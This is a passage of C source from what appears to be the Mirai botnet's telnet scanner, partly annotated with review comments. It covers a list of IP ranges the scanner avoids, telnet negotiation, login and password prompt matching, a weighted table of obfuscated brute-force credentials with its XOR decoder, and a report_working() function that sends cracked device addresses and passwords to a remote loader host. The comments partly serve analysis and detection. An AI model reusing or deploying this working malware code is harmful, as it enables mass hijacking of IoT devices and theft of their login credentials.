(o1 == 216 && o2 == 237 && o3 >= 128 && o3 < 159) || //Choopa & Vultr
808
(o1 == 108 && o2 == 61) || //Choopa & Vultr
809
(o1 == 45 && o2 == 76) || //Choopa & Vultr
810
(o1 == 185 && o2 == 11 && o3 >= 144 && o3 < 148) || //Blazingfast & Nforce
811
(o1 == 185 && o2 == 56 && o3 >= 21 && o3 < 23) || //Blazingfast & Nforce
812
(o1 == 185 && o2 == 61 && o3 >= 136 && o3 < 139) || //Blazingfast & Nforce
813
(o1 == 185 && o2 == 62 && o3 >= 187 && o3 < 191) || //Blazingfast & Nforce
814
(o1 == 66 && o2 == 150 && o3 >= 120 && o3 < 215) || //Blazingfast & Nforce
815
(o1 == 66 && o2 == 151 && o3 >= 137 && o3 < 139) || //Blazingfast & Nforce
816
(o1 == 64 && o2 == 94 && o3 >= 237 && o3 < 255) || //Blazingfast & Nforce
817
(o1 == 63 && o2 == 251 && o3 >= 19 && o3 < 21) || //Blazingfast & Nforce
818
(o1 == 70 && o2 == 42 && o3 >= 73 && o3 < 75) || //Blazingfast & Nforce
819
(o1 == 74 && o2 == 91 && o3 >= 113 && o3 < 115) || //Blazingfast & Nforce
820
(o1 == 74 && o2 == 201 && o3 >= 56 && o3 < 58) || //Blazingfast & Nforce
821
(o1 == 188 && o2 == 209 && o3 >= 48 && o3 < 53) || //Blazingfast & Nforce
822
(o1 == 188 && o2 == 165) || //OVH
823
(o1 == 149 && o2 == 202) || //OVH
824
(o1 == 151 && o2 == 80) || //OVH
825
(o1 == 164 && o2 == 132) || //OVH
826
(o1 == 176 && o2 == 31) || //OVH
827
(o1 == 167 && o2 == 114) || //OVH
828
(o1 == 178 && o2 == 32) || //OVH
829
(o1 == 178 && o2 == 33) || //OVH
830
(o1 == 37 && o2 == 59) || //OVH
831
(o1 == 37 && o2 == 187) || //OVH
832
(o1 == 46 && o2 == 105) || //OVH
833
(o1 == 51 && o2 == 254) || //OVH
834
(o1 == 51 && o2 == 255) || //OVH
835
(o1 == 5 && o2 == 135) || //OVH
836
(o1 == 5 && o2 == 196) || //OVH
837
(o1 == 5 && o2 == 39) || //OVH
838
(o1 == 91 && o2 == 134) || //OVH
839
(o1 == 104 && o2 == 200 && o3 >= 128 && o3 < 159) || //Total Server Solutions
840
(o1 == 107 && o2 == 152 && o3 >= 96 && o3 < 111) || //Total Server Solutions
841
(o1 == 107 && o2 == 181 && o3 >= 160 && o3 < 189) || //Total Server Solutions
842
(o1 == 172 && o2 == 98 && o3 >= 64 && o3 < 95) || //Total Server Solutions
843
(o1 == 184 && o2 == 170 && o3 >= 240 && o3 < 255) || //Total Server Solutions
844
(o1 == 192 && o2 == 111 && o3 >= 128 && o3 < 143) || //Total Server Solutions
845
(o1 == 192 && o2 == 252 && o3 >= 208 && o3 < 223) || //Total Server Solutions
846
(o1 == 192 && o2 == 40 && o3 >= 56 && o3 < 59) || //Total Server Solutions
847
(o1 == 198 && o2 == 8 && o3 >= 81 && o3 < 95) || //Total Server Solutions
848
(o1 == 199 && o2 == 116 && o3 >= 112 && o3 < 119) || //Total Server Solutions
849
(o1 == 199 && o2 == 229 && o3 >= 248 && o3 < 255) || //Total Server Solutions
850
(o1 == 199 && o2 == 36 && o3 >= 220 && o3 < 223) || //Total Server Solutions
851
(o1 == 199 && o2 == 58 && o3 >= 184 && o3 < 187) || //Total Server Solutions
852
(o1 == 206 && o2 == 220 && o3 >= 172 && o3 < 175) || //Total Server Solutions
853
(o1 == 208 && o2 == 78 && o3 >= 40 && o3 < 43) || //Total Server Solutions
854
(o1 == 208 && o2 == 93 && o3 >= 192 && o3 < 193) || //Total Server Solutions
855
(o1 == 66 && o2 == 71 && o3 >= 240 && o3 < 255) || //Total Server Solutions
856
(o1 == 98 && o2 == 142 && o3 >= 208 && o3 < 223) || //Total Server Solutions
857
(o1 == 107 && o2 >= 20 && o2 < 24) || //Amazon
858
(o1 == 35 && o2 >= 159 && o2 < 183) || //Amazon
859
(o1 == 52 && o2 >= 1 && o2 < 95) || //Amazon
860
(o1 == 52 && o2 >= 95 && o2 < 255) || //Amazon + Microsoft
861
(o1 == 54 && o2 >= 64 && o2 < 95) || //Amazon + Microsoft
862
(o1 == 54 && o2 >= 144 && o2 < 255) || //Amazon + Microsoft
863
(o1 == 13 && o2 >= 52 && o2 < 60) || //Amazon + Microsoft
864
(o1 == 13 && o2 >= 112 && o2 < 115) || //Amazon + Microsoft
865
(o1 == 163 && o2 == 172) || //ONLINE SAS
866
(o1 == 51 && o2 >= 15 && o2 < 255) || //ONLINE SAS
867
(o1 == 79 && o2 == 121 && o3 >= 128 && o3 < 255) || //Some more
868
(o1 == 212 && o2 == 47 && o3 >= 224 && o3 < 255) || //Some more
869
(o1 == 89 && o2 == 34 && o3 >= 96 && o3 < 97) || //Some more
870
(o1 == 219 && o2 >= 216 && o2 < 231) || //Some more
871
(o1 == 23 && o2 >= 94 && o2 < 109) || //Some more
872
(o1 == 178 && o2 >= 62 && o2 < 63) || //Some more
873
(o1 == 106 && o2 >= 182 && o2 < 189) || //Some more
874
(o1 == 106 && o2 >= 184) || //Some more
875
(o1 == 34 && o2 >= 245 && o2 < 255) || //Some more
876
(o1 == 87 && o2 >= 97 && o2 < 99) || //Some more
877
(o1 == 86 && o2 == 208) || //Some more
878
(o1 == 86 && o2 == 209) || //Some more
879
(o1 == 193 && o2 == 164) || //Some more
880
(o1 == 120 && o2 >= 103 && o2 < 108) || //Ministry of Education Computer Science
881
(o1 == 188 && o2 == 68) || //Ministry of Education Computer Science
882
(o1 == 78 && o2 == 46) || //Ministry of Education Computer Science
883
(o1 >= 224) || //Multicast
884
(o1 == 6 || o1 == 7 || o1 == 11 || o1 == 21 || o1 == 22 || o1 == 26 || o1 == 28 || o1 == 29 || o1 == 30 || o1 == 33 || o1 == 55 || o1 == 214 || o1 == 215) // Department of Defense
885
);
886
887
return INET_ADDR(o1,o2,o3,o4);
888
}
889
static int consume_iacs(struct scanner_connection *conn)
890
{
891
int consumed = 0;
892
uint8_t *ptr = conn->rdbuf;
893
894
while (consumed < conn->rdbuf_pos)
895
{
896
int i;
897
898
if (*ptr != 0xff)
899
break;
900
else if (*ptr == 0xff)
901
{
902
if (!can_consume(conn, ptr, 1))
903
break;
904
if (ptr[1] == 0xff)
905
{
906
ptr += 2;
907
consumed += 2;
908
continue;
909
}
910
else if (ptr[1] == 0xfd)
911
{
912
uint8_t tmp1[3] = {255, 251, 31};
913
uint8_t tmp2[9] = {255, 250, 31, 0, 80, 0, 24, 255, 240};
914
915
if (!can_consume(conn, ptr, 2))
916
break;
917
if (ptr[2] != 31)
918
goto iac_wont;
919
920
ptr += 3;
921
consumed += 3;
922
923
send(conn->fd, tmp1, 3, MSG_NOSIGNAL);
924
send(conn->fd, tmp2, 9, MSG_NOSIGNAL);
925
}
926
else
927
{
928
iac_wont:
929
930
if (!can_consume(conn, ptr, 2))
931
break;
932
933
for (i = 0; i < 3; i++)
934
{
935
if (ptr[i] == 0xfd)
936
ptr[i] = 0xfc;
937
else if (ptr[i] == 0xfb)
938
ptr[i] = 0xfd;
939
}
940
941
send(conn->fd, ptr, 3, MSG_NOSIGNAL);
942
ptr += 3;
943
consumed += 3;
944
}
945
}
946
}
947
948
return consumed;
949
}
950
951
static int consume_any_prompt(struct scanner_connection *conn)
952
{
953
char *pch;
954
int i, prompt_ending = -1;
955
956
for (i = conn->rdbuf_pos - 1; i > 0; i--)
957
{
958
if (conn->rdbuf[i] == ':' || conn->rdbuf[i] == '>' || conn->rdbuf[i] == '$' || conn->rdbuf[i] == '#' || conn->rdbuf[i] == '%')
959
{
960
prompt_ending = i + 1;
961
break;
962
}
963
}
964
965
if (prompt_ending == -1)
966
return 0;
967
else
968
return prompt_ending;
969
}
970
971
/*
 * Locate a login/username prompt in conn->rdbuf.
 *
 * First pass: same backward scan as consume_any_prompt() for a trailing
 * prompt character (':', '>', '$', '#', '%'), returning the index after it.
 * Fallback: if no prompt character is found, search the buffer for the
 * substrings "ogin" (matches "login"/"Login") and then "enter".
 *
 * Returns the position reported by the matching strategy, or 0 if nothing
 * matched. util_memsearch() is a project helper; the code only relies on it
 * returning -1 when the needle is absent -- presumably it otherwise returns
 * the offset just past the match, verify against util.c.
 *
 * NOTE(review): as in consume_any_prompt(), the backward scan never looks at
 * index 0.
 */
static int consume_user_prompt(struct scanner_connection *conn)
{
    char *pch; // unused
    int i, prompt_ending = -1;

    for (i = conn->rdbuf_pos - 1; i > 0; i--)
    {
        if (conn->rdbuf[i] == ':' || conn->rdbuf[i] == '>' || conn->rdbuf[i] == '$' || conn->rdbuf[i] == '#' || conn->rdbuf[i] == '%')
        {
            prompt_ending = i + 1;
            break;
        }
    }

    if (prompt_ending == -1)
    {
        int tmp;

        // substring fallbacks; lengths are the needle lengths without a terminator
        if ((tmp = util_memsearch(conn->rdbuf, conn->rdbuf_pos, "ogin", 4)) != -1)
            prompt_ending = tmp;
        else if ((tmp = util_memsearch(conn->rdbuf, conn->rdbuf_pos, "enter", 5)) != -1)
            prompt_ending = tmp;
    }

    if (prompt_ending == -1)
        return 0;
    else
        return prompt_ending;
}
/*
 * Locate a password prompt in conn->rdbuf.
 *
 * Same structure as consume_user_prompt(), with two differences: '%' is not
 * treated as a prompt character here, and the only substring fallback is
 * "assword" (matches "password"/"Password").
 *
 * Returns the index after the prompt, the util_memsearch() result for the
 * fallback, or 0 when nothing matched. The backward scan stops at i > 0, so
 * index 0 is never checked.
 */
static int consume_pass_prompt(struct scanner_connection *conn)
{
    char *pch; // unused
    int i, prompt_ending = -1;

    for (i = conn->rdbuf_pos - 1; i > 0; i--)
    {
        if (conn->rdbuf[i] == ':' || conn->rdbuf[i] == '>' || conn->rdbuf[i] == '$' || conn->rdbuf[i] == '#')
        {
            prompt_ending = i + 1;
            break;
        }
    }

    if (prompt_ending == -1)
    {
        int tmp;

        if ((tmp = util_memsearch(conn->rdbuf, conn->rdbuf_pos, "assword", 7)) != -1)
            prompt_ending = tmp;
    }

    if (prompt_ending == -1)
        return 0;
    else
        return prompt_ending;
}
/*
 * Classify the response received after a credential attempt.
 *
 * Two strings are pulled from the obfuscated string table: TABLE_SCAN_NCORRECT
 * (checked first) and TABLE_SCAN_RESP. Each is unlocked only for the duration
 * of its use and re-locked before returning on every path.
 *
 * Returns:
 *   -1  the NCORRECT token was found in the buffer (attempt rejected)
 *    0  neither token was found yet (keep reading)
 *   >0  the util_memsearch() result for the RESP token
 *
 * `len - 1` is passed as the needle length on both searches -- presumably the
 * table length includes a trailing NUL; confirm against table.c. The return
 * value is ambiguous if util_memsearch() can legitimately return 0.
 */
static int consume_resp_prompt(struct scanner_connection *conn)
{
    char *tkn_resp;
    int prompt_ending, len;

    table_unlock_val(TABLE_SCAN_NCORRECT);
    tkn_resp = table_retrieve_val(TABLE_SCAN_NCORRECT, &len);
    if (util_memsearch(conn->rdbuf, conn->rdbuf_pos, tkn_resp, len - 1) != -1)
    {
        // re-lock before the early return so the table is never left exposed
        table_lock_val(TABLE_SCAN_NCORRECT);
        return -1;
    }
    table_lock_val(TABLE_SCAN_NCORRECT);

    table_unlock_val(TABLE_SCAN_RESP);
    tkn_resp = table_retrieve_val(TABLE_SCAN_RESP, &len);
    prompt_ending = util_memsearch(conn->rdbuf, conn->rdbuf_pos, tkn_resp, len - 1);
    table_lock_val(TABLE_SCAN_RESP);

    if (prompt_ending == -1)
        return 0;
    else
        return prompt_ending;
}
/*
 * Append one credential pair to the global auth_table.
 *
 * enc_user / enc_pass are obfuscated strings; deobf() returns a freshly
 * malloc'd plaintext copy whose ownership passes to the table entry (nothing
 * in this view ever frees them). `weight` widens the entry's selection range:
 * the entry owns [weight_min, weight_max) on a cumulative scale, and
 * auth_table_max_weight advances by `weight` so random_auth_entry() can pick
 * entries proportionally.
 *
 * NOTE(review): the realloc() result is assigned straight back to auth_table
 * without a NULL check, so an allocation failure both leaks the old table and
 * dereferences NULL on the next line. The lengths are narrowed to uint8_t, so
 * a deobfuscated string longer than 255 bytes would be recorded truncated.
 */
static void add_auth_entry(char *enc_user, char *enc_pass, uint16_t weight)
{
    int tmp;

    auth_table = realloc(auth_table, (auth_table_len + 1) * sizeof (struct scanner_auth));
    auth_table[auth_table_len].username = deobf(enc_user, &tmp);
    auth_table[auth_table_len].username_len = (uint8_t)tmp;
    auth_table[auth_table_len].password = deobf(enc_pass, &tmp);
    auth_table[auth_table_len].password_len = (uint8_t)tmp;
    auth_table[auth_table_len].weight_min = auth_table_max_weight;
    // auth_table_len is post-incremented here, so this is the last write to the new slot
    auth_table[auth_table_len++].weight_max = auth_table_max_weight + weight;
    auth_table_max_weight += weight;
}
/*
 * Pick an auth_table entry at random, weighted by the ranges that
 * add_auth_entry() assigned: draw r in [0, auth_table_max_weight) and return
 * the first entry whose [weight_min, weight_max) contains it.
 *
 * Returns NULL only if no entry's range covers r, which should not happen
 * when the table was built solely through add_auth_entry().
 *
 * NOTE(review): if auth_table_max_weight is 0 (empty table) the modulo is a
 * division by zero, which is undefined behaviour; callers must ensure at
 * least one entry has been added. rand_next() is a project PRNG
 * (headers/rand.h); no assumption about its quality is made here.
 */
static struct scanner_auth *random_auth_entry(void)
{
    int i;
    uint16_t r = (uint16_t)(rand_next() % auth_table_max_weight);

    for (i = 0; i < auth_table_len; i++)
    {
        // ranges are laid out in increasing order, so skip until r is past weight_min
        if (r < auth_table[i].weight_min)
            continue;
        else if (r < auth_table[i].weight_max)
            return &auth_table[i];
    }

    return NULL;
}
1083
1084
/*
 * Report a successful login to the callback ("loader") host from a forked
 * child process; the parent returns immediately and the child never returns
 * (every path ends in exit(0)).
 *
 * The child connects over TCP to SCANIP on the port stored in the string
 * table (TABLE_SCAN_CB_PORT, unlocked only while it is read) and writes the
 * following record with a series of unchecked send() calls:
 *
 *   1 byte   0x00
 *   daddr    sizeof (ipv4_t) bytes, as passed by the caller
 *   dport    2 bytes, as passed by the caller (byte order not normalised here)
 *   1 byte   username length, then the username bytes
 *   1 byte   password length, then the password bytes
 *
 * This fixed layout is the useful detection point for this function: an
 * outbound TCP flow beginning with a zero byte and carrying length-prefixed
 * credentials. Nothing is read back from the peer.
 *
 * NOTE(review): `addr` is not zero-initialised, so sin_zero carries stack
 * garbage; harmless for connect() but worth knowing when diffing captures.
 * `entries` is declared and never used.
 */
static void report_working(ipv4_t daddr, uint16_t dport, struct scanner_auth *auth)
{
    struct sockaddr_in addr;
    int pid = fork(), fd;
    struct resolv_entries *entries = NULL; // unused

    // parent (pid > 0) and fork failure (-1) both return; only the child continues
    if (pid > 0 || pid == -1)
        return;

    if ((fd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
    {
#ifdef DEBUG
        printf("[report] Failed to call socket()\n");
#endif
        exit(0);
    }

    // the callback port is stored in the obfuscated table; unlock, copy, re-lock
    table_unlock_val(TABLE_SCAN_CB_PORT);
    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = SCANIP;
    addr.sin_port = *((port_t *)table_retrieve_val(TABLE_SCAN_CB_PORT, NULL));
    table_lock_val(TABLE_SCAN_CB_PORT);

    if (connect(fd, (struct sockaddr *)&addr, sizeof (struct sockaddr_in)) == -1)
    {
#ifdef DEBUG
        printf("[report] Failed to connect to scanner callback!\n");
#endif
        close(fd);
        exit(0);
    }

    // wire record, see header comment; send() return values are ignored
    uint8_t zero = 0;
    send(fd, &zero, sizeof (uint8_t), MSG_NOSIGNAL);
    send(fd, &daddr, sizeof (ipv4_t), MSG_NOSIGNAL);
    send(fd, &dport, sizeof (uint16_t), MSG_NOSIGNAL);
    send(fd, &(auth->username_len), sizeof (uint8_t), MSG_NOSIGNAL);
    send(fd, auth->username, auth->username_len, MSG_NOSIGNAL);
    send(fd, &(auth->password_len), sizeof (uint8_t), MSG_NOSIGNAL);
    send(fd, auth->password, auth->password_len, MSG_NOSIGNAL);

#ifdef DEBUG
    printf("[report] Send scan result to loader\n");
#endif

    close(fd);
    exit(0);
}
/*
 * Return a malloc'd, NUL-terminated deobfuscated copy of `str`, storing the
 * string length (excluding the terminator) in *len. The caller owns the
 * returned buffer.
 *
 * The loop XORs every byte with 0xDE, 0xDE, 0xFF and 0xBA in turn. The two
 * 0xDE steps cancel each other, so the effective per-byte key is
 * 0xFF ^ 0xBA == 0x45 -- useful when decoding the embedded credential list
 * during analysis. The transform is its own inverse.
 *
 * util_strlen()/util_memcpy() are project helpers (headers/util.h); they are
 * used here like strlen()/memcpy(), with the copy including the terminator.
 *
 * NOTE(review): the malloc() result is not checked before util_memcpy()
 * writes through it.
 */
static char *deobf(char *str, int *len)
{
    int i;
    char *cpy;

    *len = util_strlen(str);
    cpy = malloc(*len + 1);

    util_memcpy(cpy, str, *len + 1);

    for (i = 0; i < *len; i++)
    {
        cpy[i] ^= 0xDE;
        cpy[i] ^= 0xDE; // cancels the previous line
        cpy[i] ^= 0xFF;
        cpy[i] ^= 0xBA;
    }

    return cpy;
}
/*
 * Bounds check used by consume_iacs(): true when ptr[amount] lies inside the
 * data currently buffered in conn->rdbuf (i.e. ptr + amount is strictly
 * before rdbuf + rdbuf_pos). Callers pass the highest index they are about
 * to read, so can_consume(conn, ptr, 2) guarantees ptr[0..2] are valid.
 *
 * Only meaningful while ptr points into conn->rdbuf; the comparison is
 * pointer arithmetic within that array.
 */
static BOOL can_consume(struct scanner_connection *conn, uint8_t *ptr, int amount)
{
    uint8_t *end = conn->rdbuf + conn->rdbuf_pos;

    return ptr + amount < end;
}
#endif